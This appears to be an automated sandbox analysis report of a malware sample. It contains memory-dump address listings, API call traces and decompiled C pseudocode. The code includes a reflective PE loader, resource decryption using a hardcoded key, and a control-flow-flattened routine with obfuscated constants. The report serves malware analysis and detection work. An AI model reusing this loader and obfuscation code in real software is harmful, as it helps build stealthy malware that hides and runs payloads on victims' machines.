                                              0x00000000
                                              0x002240aa
                                              0x0022401d
                                              0x00224023
                                              0x00000000
                                              0x00000000
                                              0x00224034
                                              0x00224042
                                              0x0022404b
                                              0x0022404b
                                              0x00000000
                                              0x0022404b
                                              0x00223f3d
                                              0x00223fee
                                              0x00223ff3
                                              0x00000000
                                              0x00223ff3
                                              0x00223f49
                                              0x00223fdd
                                              0x00000000
                                              0x00223fdd
                                              0x00223f55
                                              0x00223fc7
                                              0x00223fcc
                                              0x00223fd3
                                              0x00000000
                                              0x00223fd3
                                              0x00223f5d
                                              0x00223faf
                                              0x00000000
                                              0x00223faf
                                              0x00223f65
                                              0x00223f98
                                              0x00223f9d
                                              0x00223f9f
                                              0x00000000
                                              0x00223fa5
                                              0x00223fa5
                                              0x00000000
                                              0x00223fa5
                                              0x00223f9f
                                              0x00223f6d
                                              0x00000000
                                              0x00223f73
                                              0x00223f81
                                              0x00223f86
                                              0x00000000
                                              0x00223f86
                                              0x002242e7
                                              0x002242e7
                                              0x002242ed
                                              0x00224632
                                              0x00224638
                                              0x00224736
                                              0x0022473c
                                              0x00224818
                                              0x0022481d
                                              0x00000000
                                              0x0022481d
                                              0x00224742
                                              0x00224748
                                              0x002247b9
                                              0x002247dc
                                              0x002247e1
                                              0x002247f2
                                              0x00224800
                                              0x00224807
                                              0x00000000
                                              0x00224807
                                              0x0022474a
                                              0x00224750
                                              0x00224778
                                              0x00224783
                                              0x00000000
                                              0x00224783
                                              0x00224752
                                              0x00224758
                                              0x00000000
                                              0x00000000
                                              0x00224769
                                              0x0022476e
                                              0x00000000
                                              0x0022476e
                                              0x0022463e
                                              0x0022471a
                                              0x00224725
                                              0x0022472c
                                              0x00000000
                                              0x0022472c
                                              0x00224644
                                              0x0022464a
                                              0x002246f7
                                              0x002246fc
                                              0x002246fe
                                              0x00000000
                                              0x00000000
                                              0x00224704
                                              0x00000000
                                              0x00224704
                                              0x00224650
                                              0x00224656
                                              0x002246d2
                                              0x002246e0
                                              0x00000000
                                              0x002246e6
                                              0x00224658
                                              0x0022465e
                                              0x0022468a
                                              0x00224691
                                              0x00224697
                                              0x00224699
                                              0x0022469b
                                              0x002246a3
                                              0x002246b3
                                              0x002246ba
                                              0x002246ba
                                              0x00000000
                                              0x002246ba
                                              0x00224660
                                              0x00224666
                                              0x00000000
                                              0x00000000
                                              0x00224670
                                              0x00224675
                                              0x00000000
                                              0x00224675
                                              0x002242f3
                                              0x0022461d
                                              0x00224628
                                              0x00000000
                                              0x00224628
                                              0x002242f9
                                              0x002242ff
                                              0x00224463
                                              0x00224469
                                              0x0022453f
                                              0x0022454d
                                              0x00224551
                                              0x00224558
                                              0x0022455f
                                              0x00224567
                                              0x00224568
                                              0x0022456d
                                              0x00224570
                                              0x00224572
                                              0x002245c8
                                              0x002245fb
                                              0x00224600
                                              0x00224605
                                              0x00224610
                                              0x00224615
                                              0x00224574
                                              0x00224578
                                              0x002245a2
                                              0x002245a7
                                              0x002245ac
                                              0x002245b3
                                              0x002245b5
                                              0x002245b7
                                              0x002245bc
                                              0x002245bc
                                              0x00223f08
                                              0x00223f08
                                              0x00000000
                                              0x00223f08
                                              0x00223f08
                                              0x0022446f
                                              0x00224475
                                              0x002244f3
                                              0x0022451d
                                              0x00224522
                                              0x00224527
                                              0x0022452e
                                              0x00224530
                                              0x00224532
                                              0x00224537
                                              0x00000000
                                              0x00224537
                                              0x00224477
                                              0x0022447d
                                              0x002244d6
                                              0x002244db
                                              0x002244e2
                                              0x00000000
                                              0x002244e2
                                              0x0022447f
                                              0x00224485
                                              0x00000000
                                              0x00000000
                                              0x00224499
                                              0x002244ac
                                              0x002244b5
                                              0x002244bd
                                              0x00000000
                                              0x002244bd
                                              0x00224305
                                              0x002243e8
                                              0x002243e8
                                              0x002243ea
                                              0x0022441b
                                              0x00224427
                                              0x0022442e
                                              0x00224437
                                              0x0022443e
                                              0x00224440
                                              0x00000000
                                              0x00000000
                                              0x0022444a
                                              0x0022444f
                                              0x00224451
                                              0x00224459
                                              0x00224459
                                              0x00000000
                                              0x00224459
                                              0x00224453
                                              0x00000000
                                              0x00000000
                                              0x00224455
                                              0x00224457
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00224457
                                              0x002243ec
                                              0x002243ec
                                              0x00000000
                                              0x002243ec
                                              0x0022430b
                                              0x0022430d
                                              0x0022484c
                                              0x00000000
                                              0x0022484c
                                              0x00224313
                                              0x00224319
                                              0x002243c3
                                              0x002243c8
                                              0x002243ca
                                              0x00000000
                                              0x00000000
                                              0x002243d7
                                              0x002243dc
                                              0x00000000
                                              0x002243dc
                                              0x0022431f
                                              0x00224325
                                              0x0022436c
                                              0x00224377
                                              0x0022437e
                                              0x00224380
                                              0x00000000
                                              0x00000000
                                              0x00224394
                                              0x00224399
                                              0x002243a1
                                              0x002243a6
                                              0x002243ac
                                              0x002243b4
                                              0x002243b4
                                              0x00000000
                                              0x002243a6
                                              0x00224327
                                              0x0022432d
                                              0x00000000
                                              0x00000000
                                              0x0022433e
                                              0x0022434c
                                              0x00224353
                                              0x00224353
                                              0x00224822
                                              0x00224822
                                              0x00000000
                                              0x0022482e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 4You should select the identity that belonged to you.+The Identity you selected has been deleted.;The Identity you selected could$);$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                              • API String ID: 0-736298319
                                              • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                              • Instruction ID: 573a86aa5c1b40cfc0e08eae29c6f8746d2acd47083fa5ba647bfabf12a3a63d
                                              • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                              • Instruction Fuzzy Hash: 45D213715193819BE378DF64D58ABDFBBE1BBC4304F10891DE18A862A0DBB48958CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                              • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                              • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                              • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                                • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                              • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                              • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                              • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                              • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                              • _memmove.LIBCMT ref: 1000139C
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                              • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                              • API String ID: 2007481169-3150289311
                                              • Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                              • Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
                                              • Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                              • Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}



































                                              0x10001b37
                                              0x10001b3b
                                              0x10001b3d
                                              0x10001b43
                                              0x10001b57
                                              0x10001b62
                                              0x10001b79
                                              0x10001b84
                                              0x00000000
                                              0x10001b86
                                              0x10001b8d
                                              0x10001b90
                                              0x00000000
                                              0x10001ba3
                                              0x10001ba3
                                              0x10001ba3
                                              0x10001ba8
                                              0x10001ba8
                                              0x10001bae
                                              0x10001bb0
                                              0x10001bb3
                                              0x10001bb5
                                              0x10001bb5
                                              0x10001bb5
                                              0x10001bb8
                                              0x10001bbc
                                              0x10001bc3
                                              0x10001bbe
                                              0x10001bbe
                                              0x10001bbe
                                              0x10001bbe
                                              0x10001bc7
                                              0x10001bca
                                              0x10001bcd
                                              0x10001bcd
                                              0x10001bb5
                                              0x10001bd3
                                              0x10001bd4
                                              0x10001bd9
                                              0x10001bdc
                                              0x10001bdf
                                              0x10001be2
                                              0x10001be5
                                              0x10001be8
                                              0x10001bec
                                              0x10001bf2
                                              0x10001c12
                                              0x10001c15
                                              0x10001c1b
                                              0x10001c1d
                                              0x10001c22
                                              0x10001c3c
                                              0x10001c47
                                              0x10001c4d
                                              0x10001c51
                                              0x10001c73
                                              0x10001c76
                                              0x10001c83
                                              0x10001c89
                                              0x10001c8f
                                              0x10001c95
                                              0x10001c9b
                                              0x10001ca1
                                              0x10001ca4
                                              0x10001cb1
                                              0x10001db9
                                              0x10001db9
                                              0x00000000
                                              0x10001cb7
                                              0x10001cbe
                                              0x10001cc2
                                              0x10001cc8
                                              0x10001ccb
                                              0x10001cd1
                                              0x10001ce2
                                              0x10001ce4
                                              0x10001cec
                                              0x10001cef
                                              0x10001cf2
                                              0x10001cf9
                                              0x00000000
                                              0x10001cff
                                              0x10001d04
                                              0x10001d04
                                              0x10001d07
                                              0x10001d0a
                                              0x10001d1a
                                              0x10001d0c
                                              0x10001d15
                                              0x10001d15
                                              0x10001d2b
                                              0x10001dbc
                                              0x10001dbf
                                              0x10001dcc
                                              0x10001d31
                                              0x10001d34
                                              0x10001d3b
                                              0x00000000
                                              0x10001d49
                                              0x10001d4b
                                              0x10001d50
                                              0x10001da7
                                              0x10001db6
                                              0x10001d52
                                              0x10001d52
                                              0x10001d58
                                              0x10001d99
                                              0x10001da4
                                              0x10001d5a
                                              0x10001d5a
                                              0x10001d5c
                                              0x10001d5e
                                              0x10001d67
                                              0x10001d87
                                              0x10001d96
                                              0x10001d69
                                              0x10001d6e
                                              0x10001d77
                                              0x10001d84
                                              0x10001d84
                                              0x10001d67
                                              0x10001d58
                                              0x10001d50
                                              0x10001d3b
                                              0x10001d2b
                                              0x10001cf9
                                              0x10001c53
                                              0x10001c5a
                                              0x00000000
                                              0x10001c5a
                                              0x10001c24
                                              0x10001c2d
                                              0x10001c33
                                              0x10001c35
                                              0x10001c3a
                                              0x10001c60
                                              0x10001c62
                                              0x10001c70
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10001c3a
                                              0x10001bf4
                                              0x10001bf9
                                              0x10001c07
                                              0x10001c07
                                              0x10001bf2
                                              0x10001b90
                                              0x10001b64
                                              0x10001b64
                                              0x10001b69
                                              0x10001b76
                                              0x10001b76
                                              0x10001b45
                                              0x10001b45
                                              0x10001b47
                                              0x10001b54
                                              0x10001b54

                                              APIs
                                              • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                              • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                              • Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
                                              • Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                              • Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00234B41, Relevance: 15.2, Strings: 12, Instructions: 226COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00234B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x23ca2c; // 0x4d8300
							 *((intOrPtr*)(_t202 + 0x218)) = E00237CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00228736(0x454);
							 *0x23ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002320C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0022B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0022C6C7(_v536, _v572,  *0x23ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00233E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0022E29C(_v576, _v592,  &_v520);
						_t216 =  *0x23ca2c; // 0x4d8300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00225FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00222959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x23ca2c; // 0x4d8300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}







































                                              0x00234b41
                                              0x00234b47
                                              0x00234b50
                                              0x00234b54
                                              0x00234b59
                                              0x00234b5d
                                              0x00234b64
                                              0x00234b75
                                              0x00234b79
                                              0x00234b7b
                                              0x00234b83
                                              0x00234b91
                                              0x00234b96
                                              0x00234ba1
                                              0x00234ba4
                                              0x00234ba8
                                              0x00234bad
                                              0x00234bb5
                                              0x00234bbd
                                              0x00234bc2
                                              0x00234bca
                                              0x00234bd2
                                              0x00234bda
                                              0x00234be2
                                              0x00234bea
                                              0x00234bef
                                              0x00234bf4
                                              0x00234bfc
                                              0x00234c04
                                              0x00234c0c
                                              0x00234c14
                                              0x00234c1c
                                              0x00234c2c
                                              0x00234c30
                                              0x00234c35
                                              0x00234c3d
                                              0x00234c45
                                              0x00234c4d
                                              0x00234c55
                                              0x00234c5d
                                              0x00234c6a
                                              0x00234c6d
                                              0x00234c71
                                              0x00234c79
                                              0x00234c81
                                              0x00234c89
                                              0x00234c91
                                              0x00234c99
                                              0x00234ca6
                                              0x00234cb2
                                              0x00234cb6
                                              0x00234cbb
                                              0x00234cc3
                                              0x00234ccf
                                              0x00234cd2
                                              0x00234cd6
                                              0x00234cde
                                              0x00234ce6
                                              0x00234cf7
                                              0x00234d02
                                              0x00234d06
                                              0x00234d0e
                                              0x00234d16
                                              0x00234d1e
                                              0x00234d26
                                              0x00234d2e
                                              0x00234d36
                                              0x00234d3e
                                              0x00234d46
                                              0x00234d4e
                                              0x00234d56
                                              0x00234d5e
                                              0x00234d66
                                              0x00234d6e
                                              0x00234d76
                                              0x00234d7e
                                              0x00234d8b
                                              0x00234d8f
                                              0x00234d97
                                              0x00234d9f
                                              0x00234da7
                                              0x00234db2
                                              0x00234db6
                                              0x00234dba
                                              0x00234dc2
                                              0x00234dc2
                                              0x00234dca
                                              0x00234dca
                                              0x00234dca
                                              0x00234dca
                                              0x00234dcc
                                              0x00000000
                                              0x00000000
                                              0x00234dd2
                                              0x00234e98
                                              0x00234ea0
                                              0x00234ea5
                                              0x00234ea5
                                              0x00234ea5
                                              0x00234ead
                                              0x00234eb2
                                              0x00234ebc
                                              0x00234ebc
                                              0x00000000
                                              0x00234ebc
                                              0x00234dde
                                              0x00234e69
                                              0x00234e6a
                                              0x00234e70
                                              0x00234e75
                                              0x00234e7c
                                              0x00234e7e
                                              0x00000000
                                              0x00000000
                                              0x00234e84
                                              0x00234e8e
                                              0x00000000
                                              0x00234e8e
                                              0x00234de6
                                              0x00234e4e
                                              0x00234e53
                                              0x00000000
                                              0x00234e53
                                              0x00234dee
                                              0x00234e2c
                                              0x00234e34
                                              0x00234e39
                                              0x00234e41
                                              0x00000000
                                              0x00234e41
                                              0x00234df2
                                              0x00000000
                                              0x00000000
                                              0x00234df8
                                              0x00234df9
                                              0x00234e15
                                              0x00234e1a
                                              0x00234e1d
                                              0x00234e26
                                              0x00234e27
                                              0x00234e27
                                              0x00234ec3
                                              0x00234ec9
                                              0x00234f39
                                              0x00234f4b
                                              0x00234f50
                                              0x00234f56
                                              0x00234f59
                                              0x00234f5f
                                              0x00000000
                                              0x00234f5f
                                              0x00234ecb
                                              0x00234ed1
                                              0x00234f25
                                              0x00000000
                                              0x00234f2a
                                              0x00234ed3
                                              0x00234ed9
